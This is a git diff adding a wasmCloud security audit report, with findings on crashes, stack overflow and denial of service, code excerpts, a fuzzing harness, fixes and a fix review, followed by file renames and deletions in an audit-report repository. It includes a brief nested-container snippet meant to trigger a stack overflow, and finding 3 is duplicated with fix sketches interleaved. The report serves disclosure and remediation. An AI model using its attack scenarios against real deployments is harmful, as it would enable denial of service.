Undetermined: The extent of the risk was not determined during this engagement.
Low: The risk is small or is not one the client has indicated is important.
Medium: User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High: The flaw could affect numerous users and have serious reputational, legal, or financial implications.
Difficulty Levels
Undetermined: The difficulty of exploitation was not determined during this engagement.
Low: The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium: An attacker must write an exploit or will need in-depth knowledge of the system.
High: An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.
B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Arithmetic: The proper use of mathematical operations and semantics
Auditing: The use of event auditing and logging to support monitoring
Authentication / Access Controls: The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management: The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Decentralization: The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades
Documentation: The presence of comprehensive and readable codebase documentation
Front-Running Resistance: The system’s resistance to front-running attacks
Low-Level Manipulation: The justified use of inline assembly and low-level calls
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.
C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of vulnerabilities in the future.
● Consider simplifying the switch case statements that check whether transactions are L1 messages or not. The current error handling in commitTransactions makes the codebase hard to read.
● Separate logic intended for production deployment from logic introduced for testing purposes. For example, the worker.go file contains functions and if conditions for zero-period cliques or side-chain events, which are used only in testing. Removing these from the core codebase would make the code significantly more readable.
● Fix the spelling error in the ErrNonceTooHigh log message: "height" instead of "hight". Correct spelling ensures that expected system behavior is clear.
diff --git a/findings_newupdate/tob/2023-09-wasmCloud-securityreview.txt b/findings_newupdate/tob/2023-09-wasmCloud-securityreview.txt new file mode 100644 index 0000000..936b737 --- /dev/null +++ b/findings_newupdate/tob/2023-09-wasmCloud-securityreview.txt @@ -0,0 +1,9 @@ +1. Out-of-bounds crash in extract_claims Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-WACL-1 Target: wascap/src/wasm.rs Description The strip_custom_section function does not sufficiently validate data and crashes when the range is not within the buffer (figure 1.1). The function is used in the extract_claims function and is given untrusted input. In wasmCloud-otp, even though extract_claims is called as an Erlang NIF (Native Implemented Function) and a crash could potentially bring down the VM, the panic is handled gracefully by the Rustler library, resulting in an isolated crash of the Elixir process. if let Some((id, range)) = payload.as_section() { wasm_encoder::RawSection { id, data: &buf[range], } .append_to(&mut output); } Figure 1.1: wascap/src/wasm.rs#L161-L167 We found this issue by fuzzing the extract_claims function with cargo-fuzz (figure 1.2). #![no_main] use libfuzzer_sys::fuzz_target; use getrandom::register_custom_getrandom; // TODO: the program won’t compile without this, why? fn custom_getrandom(buf: &mut [u8]) -> Result<(), getrandom::Error> { return Ok(()); } register_custom_getrandom!(custom_getrandom); fuzz_target!(|data: &[u8]| { let _ = wascap::wasm::extract_claims(data); }); Figure 1.2: A simple extract_claims fuzzing harness that passes the fuzzer-provided bytes straight to the function After fixing the issue (figure 1.3), we fuzzed the function for an extended period of time; however, we found no additional issues. if let Some((id, range)) = payload.as_section() { if range.end <= buf.len() { wasm_encoder::RawSection { id, data: &buf[range], } .append_to(&mut output); } else { return Err(errors::new(ErrorKind::InvalidCapability)); } } Figure 1.3: The fix we applied to continue fuzzing extract_claims. The code requires a new error value because we reused one of the existing ones that likely does not match the semantics. Exploit Scenario An attacker deploys a new module with invalid claims. While decoding the claims, the extract_claims function panics and crashes the Elixir process. Recommendations Short term, fix the strip_custom_section function by adding the range check shown in figure 1.3. Add the extract_claims fuzzing harness to the wascap repository and run it for an extended period of time before each release of the library. Long term, add a fuzzing harness for each Rust function that processes user-provided data. References ● Erlang - NIFs +2. Stack overflow while enumerating containers in blobstore-fs Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-WACL-2 Target: capability-providers/blobstore-fs/src/fs_utils.rs Description The all_dirs function is vulnerable to a stack overflow caused by unbounded recursion, triggered by either the presence of circular symlinks inside the root of the blobstore (as configured during startup) or the presence of excessively nested directories inside the same. Because this function is used by FsProvider::list_containers, this issue would result in a denial of service for all actors that use the method exposed by affected blobstores.
let mut subdirs: Vec<PathBuf> = Vec::new(); for dir in &dirs { let mut local_subdirs = all_dirs(prefix.join(dir.as_path()).as_path(), prefix); subdirs.append(&mut local_subdirs); } dirs.append(&mut subdirs); dirs Figure 2.1: capability-providers/blobstore-fs/src/fs_utils.rs#L24-L30 Exploit Scenario An attacker creates a circular symlink inside the storage directory. Alternatively, an attacker can—under the right circumstances—create successively nested directories with a sufficient depth to cause a stack overflow. blobstore.create_container(ctx, &"a".to_string()).await?; blobstore.create_container(ctx, &"a/a".to_string()).await?; blobstore.create_container(ctx, &"a/a/a".to_string()).await?; ... blobstore.create_container(ctx, &"a/a/a/.../a/a/a".to_string()).await?; blobstore.list_containers().await?; Figure 2.2: A possible attack on a vulnerable blobstore In practice, this attack requires the underlying file system to allow exceptionally long filenames, and we have not been able to produce a working attack payload. However, this does not prove that no such file systems exist or will exist in the future. Recommendations Short term, limit the allowable recursion depth to ensure that no stack overflow attack is possible given realistic stack sizes, as shown in figure 2.3. pub fn all_dirs(root: &Path, prefix: &Path, depth: i32) -> Vec<PathBuf> { if depth > 1000 { return vec![]; } ... // Now recursively go in all directories and collect all sub-directories let mut subdirs: Vec<PathBuf> = Vec::new(); for dir in &dirs { let mut local_subdirs = all_dirs(prefix.join(dir.as_path()).as_path(), prefix, depth + 1); subdirs.append(&mut local_subdirs); } dirs.append(&mut subdirs); dirs } Figure 2.3: Limiting the allowable recursion depth Long term, consider limiting the reliance on the underlying file system to a minimum by disallowing container nesting. For example, Base64-encode all container and object names before passing them down to the file system routines. References ● OWASP Denial of Service Cheat Sheet ("Input validation" section) +3. Denial of service in blobstore-s3 using a malicious actor Severity: Undetermined Difficulty: High Type: Data Validation Finding ID: TOB-WACL-3 Target: capability-providers/blobstore-s3/src/lib.rs Description The stream_bytes function continues looping until it detects that all of the available bytes have been sent. It does this based on the output of the send_chunk function, which reports the number of bytes sent by each call. An attacker could send specially crafted responses in which send_chunk reports that no errors were detected but also that no bytes were sent, causing stream_bytes to loop indefinitely. while bytes_sent < bytes_to_send { let chunk_offset = offset + bytes_sent; let chunk_len = (self.max_chunk_size() as u64).min(bytes_to_send - bytes_sent); bytes_sent += self.send_chunk( ctx, Chunk { is_last: offset + chunk_len > end_range, bytes: bytes[bytes_sent as usize..(bytes_sent + chunk_len) as usize] .to_vec(), offset: chunk_offset as u64, container_id: bucket_id.to_string(), object_id: cobj.object_id.clone(), }, ) .await?; } Figure 3.1: capability-providers/blobstore-s3/src/lib.rs#L188-L204 Exploit Scenario An attacker sends a maliciously crafted request to get an object from a blobstore-s3 provider, then sends successful responses that make no actual progress in the transfer by reporting that empty-sized chunks were received. Recommendations Make send_chunk report a failure if a zero-sized response is received.
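This recommendation amounts to a forward-progress guard in the streaming loop. The sketch below is written in Go purely for illustration (the provider itself is Rust), and every name in it is hypothetical:

func streamBytes(send func(chunk []byte) (int, error), data []byte, chunkSize int) error {
	sent := 0
	for sent < len(data) {
		end := sent + chunkSize
		if end > len(data) {
			end = len(data)
		}
		n, err := send(data[sent:end])
		if err != nil {
			return err
		}
		if n <= 0 {
			// A "successful" zero-byte acknowledgment would otherwise keep the
			// loop spinning forever; treat it as a transfer failure.
			return errors.New("receiver acknowledged a chunk but reported zero bytes sent")
		}
		sent += n
	}
	return nil
}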
+3. Denial of service in blobstore-s3 using malicious actor Severity: Undetermined Difficulty: High Type: Data Validation Finding ID: TOB-WACL-3 Target: capability-providers/blobstore-s3/src/lib.rs Description The stream_bytes function continues looping until it detects that all of the available bytes have been sent. It does this based on the output of the send_chunk function, which reports the number of bytes sent by each call. An attacker could send specially crafted responses in which send_chunk reports that no errors were detected while also reporting that no bytes were sent, causing stream_bytes to loop without making progress. while bytes_sent < bytes_to_send { let chunk_offset = offset + bytes_sent; let chunk_len = (self.max_chunk_size() as u64).min(bytes_to_send - bytes_sent); bytes_sent += self.send_chunk(ctx, Chunk { is_last: offset + chunk_len > end_range, bytes: bytes[bytes_sent as usize..(bytes_sent + chunk_len) as usize].to_vec(), offset: chunk_offset as u64, container_id: bucket_id.to_string(), object_id: cobj.object_id.clone(), }).await?; } Figure 3.1: capability-providers/blobstore-s3/src/lib.rs#L188-L204 Exploit Scenario An attacker sends a maliciously crafted request to get an object from a blobstore-s3 provider, then sends successful responses without making actual progress in the transfer by reporting that empty-sized chunks were received. Recommendations Make send_chunk report a failure if a zero-sized response is received.
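Implementing the recommendation amounts to rejecting a zero-byte acknowledgement so that every loop iteration must make progress. A schematic, self-contained version of the guarded loop follows (send_one_chunk is a hypothetical stand-in for the provider's send_chunk call):

// Sketch: a chunked-transfer loop that fails fast on zero-progress responses.
fn stream_all(
    bytes_to_send: u64,
    mut send_one_chunk: impl FnMut(u64) -> Result<u64, String>,
) -> Result<(), String> {
    let mut bytes_sent = 0u64;
    while bytes_sent < bytes_to_send {
        let sent = send_one_chunk(bytes_sent)?;
        if sent == 0 {
            // A "successful" response that moved no data would otherwise
            // keep this loop spinning indefinitely.
            return Err("peer acknowledged zero bytes; aborting transfer".to_string());
        }
        bytes_sent += sent;
    }
    Ok(())
}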
+4. Unexpected panic in validate_token Severity: Informational Difficulty: High Type: Error Reporting Finding ID: TOB-WACL-4 Target: wascap/src/jwt.rs Description The validate_token function from the wascap library panics with an out-of-bounds error when its input is given in an unexpected format. The function expects the input to be a valid JWT token with three segments separated by dots (figure 4.1). This implicit assumption is satisfied by the library's internal callers; however, the function is public and does not mention the assumption in its documentation. /// Validates a signed JWT. This will check the signature, expiration time, and not-valid-before time pub fn validate_token<T>(input: &str) -> Result<TokenValidation> where T: Serialize + DeserializeOwned + WascapEntity, { let segments: Vec<&str> = input.split('.').collect(); let header_and_claims = format!("{}.{}", segments[0], segments[1]); let sig = base64::decode_config(segments[2], base64::URL_SAFE_NO_PAD)?; ... } Figure 4.1: wascap/src/jwt.rs#L612-L641 Exploit Scenario A developer uses the validate_token function expecting it to fully validate the token string. The function receives untrusted malicious input that forces the program to panic. Recommendations Short term, add input format validation before accessing the segments, and add a test case with malformed input. Long term, always validate all inputs to functions, or document the input assumptions if validation is not in place for a specific reason.
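The short-term recommendation can be implemented with a segment-count check before any indexing. A self-contained sketch follows (split_jwt is a hypothetical helper, not the wascap API):

// Sketch: validate the three-segment JWT shape before indexing,
// returning an error instead of panicking on malformed input.
fn split_jwt(input: &str) -> Result<(&str, &str, &str), String> {
    let segments: Vec<&str> = input.split('.').collect();
    if segments.len() != 3 {
        return Err(format!("expected 3 JWT segments, found {}", segments.len()));
    }
    Ok((segments[0], segments[1], segments[2]))
}

fn main() {
    assert!(split_jwt("header.claims.signature").is_ok());
    assert!(split_jwt("not-a-jwt").is_err()); // previously an out-of-bounds panic
}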
+5. Incorrect error message when starting actor from file Severity: Informational Difficulty: Low Type: Error Reporting Finding ID: TOB-WACL-5 Target: host_core/lib/host_core/actors/actor_supervisor.ex Description The error message logged when starting an actor from a file contains a string interpolation bug that causes the message not to include the fileref content (figure 5.1). As a result, the error message contains the literal string ${fileref} instead. It is worth noting that the fileref content will be included anyway as an attribute.
Logger .error( "Failed to read actor file from ${fileref} : #{ inspect(err) } " , fileref : fileref ) Figure 5.1: host_core/lib/host_core/actors/actor_supervisor.ex#L301 Recommendations Short term, change the error message to correctly interpolate the fileref string. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. 
Code Maturity Categories:
Arithmetic: The proper use of mathematical operations and semantics
Auditing: The use of event auditing and logging to support monitoring
Authentication / Access Controls: The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Configuration: The configuration of system components in accordance with best practices
Cryptography and Key Management: The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Data Handling: The safe handling of user inputs and data processed by the system
Documentation: The presence of comprehensive and readable codebase documentation
Memory Safety and Error Handling: The presence of memory safety and robust error-handling mechanisms
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria:
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.
C. Fix Review Results When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not a comprehensive analysis of the system. On October 4, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the wasmCloud team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, wasmCloud has resolved all identified issues. For additional information, please see the Detailed Fix Review Results below.
1. Out-of-bounds crash in extract_claims: Resolved
2. Stack overflow while enumerating containers in blobstore-fs: Resolved
3. Denial of service in blobstore-s3 using malicious actor: Resolved
4. Unexpected panic in validate_token: Resolved
5. Incorrect error message when starting actor from file: Resolved
Detailed Fix Review Results TOB-WACL-1: Out-of-bounds crash in extract_claims. Resolved in commit 664d9b9. The missing range validation was added. TOB-WACL-2: Stack overflow while enumerating containers in blobstore-fs. Resolved in PR capability-providers/271. The fix limits the recursion to a maximum of 1,000 calls. TOB-WACL-3: Denial of service in blobstore-s3 using malicious actor. Resolved in PR capability-providers/271. The missing response emptiness check was added. TOB-WACL-4: Unexpected panic in validate_token. Resolved in PR wascap/52. The missing segment-count validation was added. TOB-WACL-5: Incorrect error message when starting actor from file. Resolved in PR wasmcloud-otp/648. The mistake in the log message's string interpolation was fixed. D. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed.
Fix Status:
Undetermined: The status of the issue was not determined during this engagement.
Unresolved: The issue persists and has not been resolved.
Partially Resolved: The issue persists but has been partially resolved.
Resolved: The issue has been sufficiently resolved.
diff --git a/findings_newupdate/API3.txt b/findings_newupdate/tob/API3.txt similarity index 100% rename from findings_newupdate/API3.txt rename to findings_newupdate/tob/API3.txt diff --git a/findings_newupdate/AdvancedBlockchainQ12022.txt b/findings_newupdate/tob/AdvancedBlockchainQ12022.txt similarity index 100% rename from findings_newupdate/AdvancedBlockchainQ12022.txt rename to findings_newupdate/tob/AdvancedBlockchainQ12022.txt diff --git a/findings_newupdate/AnteProtocol.txt b/findings_newupdate/tob/AnteProtocol.txt similarity index 100% rename from findings_newupdate/AnteProtocol.txt rename to findings_newupdate/tob/AnteProtocol.txt diff --git a/findings_newupdate/CoreDNS.txt b/findings_newupdate/tob/CoreDNS.txt similarity index 100% rename from findings_newupdate/CoreDNS.txt rename to findings_newupdate/tob/CoreDNS.txt diff --git a/findings_newupdate/DFINITYCanisterSandbox.txt b/findings_newupdate/tob/DFINITYCanisterSandbox.txt similarity index 100% rename from findings_newupdate/DFINITYCanisterSandbox.txt rename to findings_newupdate/tob/DFINITYCanisterSandbox.txt diff --git a/findings_newupdate/DFINITYThresholdECDSAandBtcCanisters.txt b/findings_newupdate/tob/DFINITYThresholdECDSAandBtcCanisters.txt similarity index 100% rename from findings_newupdate/DFINITYThresholdECDSAandBtcCanisters.txt rename to findings_newupdate/tob/DFINITYThresholdECDSAandBtcCanisters.txt diff --git a/findings_newupdate/DeGate.txt b/findings_newupdate/tob/DeGate.txt similarity index 100% rename from findings_newupdate/DeGate.txt rename to findings_newupdate/tob/DeGate.txt diff --git a/findings_newupdate/FraxQ22022.txt b/findings_newupdate/tob/FraxQ22022.txt similarity index 100% rename from findings_newupdate/FraxQ22022.txt rename to findings_newupdate/tob/FraxQ22022.txt diff --git a/findings_newupdate/FraxQ42021.txt b/findings_newupdate/tob/FraxQ42021.txt similarity index 100% rename from findings_newupdate/FraxQ42021.txt rename to findings_newupdate/tob/FraxQ42021.txt diff --git a/findings_newupdate/FujiProtocol.txt b/findings_newupdate/tob/FujiProtocol.txt similarity index 100% rename from findings_newupdate/FujiProtocol.txt rename to findings_newupdate/tob/FujiProtocol.txt diff --git a/findings_newupdate/Galoy.txt b/findings_newupdate/tob/Galoy.txt similarity index 100% rename from findings_newupdate/Galoy.txt rename to findings_newupdate/tob/Galoy.txt diff --git a/findings_newupdate/Linkerd-securityreview.txt b/findings_newupdate/tob/Linkerd-securityreview.txt similarity index 100% rename from findings_newupdate/Linkerd-securityreview.txt rename to findings_newupdate/tob/Linkerd-securityreview.txt diff --git a/findings_newupdate/Linkerd-threatmodel.txt b/findings_newupdate/tob/Linkerd-threatmodel.txt similarity index 100% rename from findings_newupdate/Linkerd-threatmodel.txt rename to findings_newupdate/tob/Linkerd-threatmodel.txt diff --git a/findings_newupdate/LooksRare.txt b/findings_newupdate/tob/LooksRare.txt similarity index 100% rename from findings_newupdate/LooksRare.txt rename to findings_newupdate/tob/LooksRare.txt diff --git a/findings_newupdate/MapleFinance.txt b/findings_newupdate/tob/MapleFinance.txt similarity index 100% rename from findings_newupdate/MapleFinance.txt rename to
findings_newupdate/tob/MapleFinance.txt diff --git a/findings_newupdate/MesonProtocolFixReview.txt b/findings_newupdate/tob/MesonProtocolFixReview.txt similarity index 100% rename from findings_newupdate/MesonProtocolFixReview.txt rename to findings_newupdate/tob/MesonProtocolFixReview.txt diff --git a/findings_newupdate/Microsoft-go-cose.txt b/findings_newupdate/tob/Microsoft-go-cose.txt similarity index 100% rename from findings_newupdate/Microsoft-go-cose.txt rename to findings_newupdate/tob/Microsoft-go-cose.txt diff --git a/findings_newupdate/MorphoLabs.txt b/findings_newupdate/tob/MorphoLabs.txt similarity index 100% rename from findings_newupdate/MorphoLabs.txt rename to findings_newupdate/tob/MorphoLabs.txt diff --git a/findings_newupdate/NFTX.txt b/findings_newupdate/tob/NFTX.txt similarity index 100% rename from findings_newupdate/NFTX.txt rename to findings_newupdate/tob/NFTX.txt diff --git a/findings_newupdate/ParallelFinance.txt b/findings_newupdate/tob/ParallelFinance.txt similarity index 100% rename from findings_newupdate/ParallelFinance.txt rename to findings_newupdate/tob/ParallelFinance.txt diff --git a/findings_newupdate/ParallelFinance2.txt b/findings_newupdate/tob/ParallelFinance2.txt similarity index 100% rename from findings_newupdate/ParallelFinance2.txt rename to findings_newupdate/tob/ParallelFinance2.txt diff --git a/findings_newupdate/ParallelFinance3.txt b/findings_newupdate/tob/ParallelFinance3.txt similarity index 100% rename from findings_newupdate/ParallelFinance3.txt rename to findings_newupdate/tob/ParallelFinance3.txt diff --git a/findings_newupdate/Primitive.txt b/findings_newupdate/tob/Primitive.txt similarity index 100% rename from findings_newupdate/Primitive.txt rename to findings_newupdate/tob/Primitive.txt diff --git a/findings_newupdate/RocketPool.txt b/findings_newupdate/tob/RocketPool.txt similarity index 100% rename from findings_newupdate/RocketPool.txt rename to findings_newupdate/tob/RocketPool.txt diff --git a/findings_newupdate/ShellProtocolv2.txt b/findings_newupdate/tob/ShellProtocolv2.txt similarity index 100% rename from findings_newupdate/ShellProtocolv2.txt rename to findings_newupdate/tob/ShellProtocolv2.txt diff --git a/findings_newupdate/Sherlockv2.txt b/findings_newupdate/tob/Sherlockv2.txt similarity index 100% rename from findings_newupdate/Sherlockv2.txt rename to findings_newupdate/tob/Sherlockv2.txt diff --git a/findings_newupdate/SimpleXChat.txt b/findings_newupdate/tob/SimpleXChat.txt similarity index 100% rename from findings_newupdate/SimpleXChat.txt rename to findings_newupdate/tob/SimpleXChat.txt diff --git a/findings_newupdate/Tekton.txt b/findings_newupdate/tob/Tekton.txt similarity index 100% rename from findings_newupdate/Tekton.txt rename to findings_newupdate/tob/Tekton.txt diff --git a/findings_newupdate/Umee.txt b/findings_newupdate/tob/Umee.txt similarity index 100% rename from findings_newupdate/Umee.txt rename to findings_newupdate/tob/Umee.txt diff --git a/findings_newupdate/YieldV2.txt b/findings_newupdate/tob/YieldV2.txt similarity index 100% rename from findings_newupdate/YieldV2.txt rename to findings_newupdate/tob/YieldV2.txt diff --git a/findings_newupdate/osquery.txt b/findings_newupdate/tob/osquery.txt similarity index 100% rename from findings_newupdate/osquery.txt rename to findings_newupdate/tob/osquery.txt diff --git a/pdfs/0x-protocol.pdf b/pdfs/0x-protocol.pdf deleted file mode 100644 index 7c52ee8..0000000 Binary files a/pdfs/0x-protocol.pdf and /dev/null differ diff --git 
a/pdfs/2022-07-mobilecoin-securityreview.pdf b/pdfs/2022-07-mobilecoin-securityreview.pdf deleted file mode 100644 index f063d8d..0000000 Binary files a/pdfs/2022-07-mobilecoin-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-aleosystems-snarkvm-securityreview.pdf b/pdfs/2022-09-aleosystems-snarkvm-securityreview.pdf deleted file mode 100644 index d1560ee..0000000 Binary files a/pdfs/2022-09-aleosystems-snarkvm-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-alphasoc-alphasocapi-securityreview.pdf b/pdfs/2022-09-alphasoc-alphasocapi-securityreview.pdf deleted file mode 100644 index f5e4fed..0000000 Binary files a/pdfs/2022-09-alphasoc-alphasocapi-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-incrementprotocol-fixreview.pdf b/pdfs/2022-09-incrementprotocol-fixreview.pdf deleted file mode 100644 index b6cc6af..0000000 Binary files a/pdfs/2022-09-incrementprotocol-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-incrementprotocol-securityreview.pdf b/pdfs/2022-09-incrementprotocol-securityreview.pdf deleted file mode 100644 index 64a42a0..0000000 Binary files a/pdfs/2022-09-incrementprotocol-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf b/pdfs/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf deleted file mode 100644 index 1acb0ac..0000000 Binary files a/pdfs/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf b/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf deleted file mode 100644 index 861d4fb..0000000 Binary files a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf b/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf deleted file mode 100644 index 573ae7a..0000000 Binary files a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-GSquared-fixreview.pdf b/pdfs/2022-10-GSquared-fixreview.pdf deleted file mode 100644 index 85fb04c..0000000 Binary files a/pdfs/2022-10-GSquared-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-GSquared-securityreview.pdf b/pdfs/2022-10-GSquared-securityreview.pdf deleted file mode 100644 index c7a01da..0000000 Binary files a/pdfs/2022-10-GSquared-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf b/pdfs/2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf deleted file mode 100644 index 4038586..0000000 Binary files a/pdfs/2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.pdf b/pdfs/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.pdf deleted file mode 100644 index cfbc8c4..0000000 Binary files a/pdfs/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-shimacapital-ondo-fixreview.pdf b/pdfs/2022-10-shimacapital-ondo-fixreview.pdf deleted file mode 100644 index 180bfc4..0000000 Binary files a/pdfs/2022-10-shimacapital-ondo-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-shimacapital-ondo-securityreview.pdf b/pdfs/2022-10-shimacapital-ondo-securityreview.pdf deleted file mode 100644 index 
0bd67c2..0000000 Binary files a/pdfs/2022-10-shimacapital-ondo-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-11-optimism-securityreview.pdf b/pdfs/2022-11-optimism-securityreview.pdf deleted file mode 100644 index e99d3d4..0000000 Binary files a/pdfs/2022-11-optimism-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-12-curl-securityreview.pdf b/pdfs/2022-12-curl-securityreview.pdf deleted file mode 100644 index 5df6ed8..0000000 Binary files a/pdfs/2022-12-curl-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-12-curl-threatmodel.pdf b/pdfs/2022-12-curl-threatmodel.pdf deleted file mode 100644 index 9f07983..0000000 Binary files a/pdfs/2022-12-curl-threatmodel.pdf and /dev/null differ diff --git a/pdfs/2023-01-keda-securityreview.pdf b/pdfs/2023-01-keda-securityreview.pdf deleted file mode 100644 index 5edc825..0000000 Binary files a/pdfs/2023-01-keda-securityreview.pdf and /dev/null differ diff --git a/pdfs/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf b/pdfs/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf deleted file mode 100644 index d87e8b6..0000000 Binary files a/pdfs/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf and /dev/null differ diff --git a/pdfs/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf b/pdfs/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf deleted file mode 100644 index 52434e4..0000000 Binary files a/pdfs/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf and /dev/null differ diff --git a/pdfs/2023-02-solana-token-2022-program-securityreview.pdf b/pdfs/2023-02-solana-token-2022-program-securityreview.pdf deleted file mode 100644 index 9ef7353..0000000 Binary files a/pdfs/2023-02-solana-token-2022-program-securityreview.pdf and /dev/null differ diff --git a/pdfs/88mph.pdf b/pdfs/88mph.pdf deleted file mode 100644 index 5657cbd..0000000 Binary files a/pdfs/88mph.pdf and /dev/null differ diff --git a/pdfs/API3.pdf b/pdfs/API3.pdf deleted file mode 100644 index a8d8701..0000000 Binary files a/pdfs/API3.pdf and /dev/null differ diff --git a/pdfs/AcalaNetwork.pdf b/pdfs/AcalaNetwork.pdf deleted file mode 100644 index 1e1a55f..0000000 Binary files a/pdfs/AcalaNetwork.pdf and /dev/null differ diff --git a/pdfs/AdvancedBlockchain.pdf b/pdfs/AdvancedBlockchain.pdf deleted file mode 100644 index 62faaa2..0000000 Binary files a/pdfs/AdvancedBlockchain.pdf and /dev/null differ diff --git a/pdfs/AdvancedBlockchainQ12022.pdf b/pdfs/AdvancedBlockchainQ12022.pdf deleted file mode 100644 index 63dad5d..0000000 Binary files a/pdfs/AdvancedBlockchainQ12022.pdf and /dev/null differ diff --git a/pdfs/AdvancedBlockchainQ42021.pdf b/pdfs/AdvancedBlockchainQ42021.pdf deleted file mode 100644 index b4d9730..0000000 Binary files a/pdfs/AdvancedBlockchainQ42021.pdf and /dev/null differ diff --git a/pdfs/AlephBFT.pdf b/pdfs/AlephBFT.pdf deleted file mode 100644 index ee8e56a..0000000 Binary files a/pdfs/AlephBFT.pdf and /dev/null differ diff --git a/pdfs/AnteProtocol.pdf b/pdfs/AnteProtocol.pdf deleted file mode 100644 index 850a161..0000000 Binary files a/pdfs/AnteProtocol.pdf and /dev/null differ diff --git a/pdfs/AnteProtocolFixReview.pdf b/pdfs/AnteProtocolFixReview.pdf deleted file mode 100644 index fc6ba7a..0000000 Binary files a/pdfs/AnteProtocolFixReview.pdf and /dev/null differ diff --git a/pdfs/BalancerCore.pdf b/pdfs/BalancerCore.pdf deleted file mode 100644 index 92b9f93..0000000 Binary files a/pdfs/BalancerCore.pdf and /dev/null differ diff --git a/pdfs/BeethovenXSummary.pdf 
